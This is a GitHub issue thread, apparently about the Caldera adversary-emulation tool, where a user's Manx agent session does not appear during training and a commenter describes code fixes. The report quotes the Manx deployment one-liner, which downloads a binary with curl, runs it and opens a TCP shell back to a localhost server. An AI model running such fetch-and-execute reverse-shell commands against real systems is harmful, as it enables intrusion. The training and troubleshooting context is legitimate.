-
Notifications
You must be signed in to change notification settings - Fork 1.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Unable to see Manx session #3072
Comments
Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/ |
Nothing found related to my issue here: "http://caldera.readthedocs.io/" |
Hello, any update ? |
I just found a workaround to let caldera correctly compile the executable adding env['GOCACHE'] = "/tmp" <path_to_caldera/app/service/file_svc.py> starting from line 153 (probably not related with the issue itself but solved some compilation warnings):
After that just add/edit the following lines on <path_to_caldera/app/contacts/contact_tcp.py> because the send() method was incorrectly called on TransportSocket rather than in the underlying Socket:
Hope this helps. |
Hi,
When I was doing the user training in caldera, I faced issue while trying the manx related flag.
After pasting the manx sh tcp command in the calder server, I can see the agent entry under agents tab but unable to see the host under session also getting error "Error refreshing Manx"
Manx Command:
server="http://127.0.0.1:8888";socket="127.0.0.1:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > super_scary;chmod +x super_scary;./super_scary -http $server -socket $socket -contact $contact -v
The text was updated successfully, but these errors were encountered: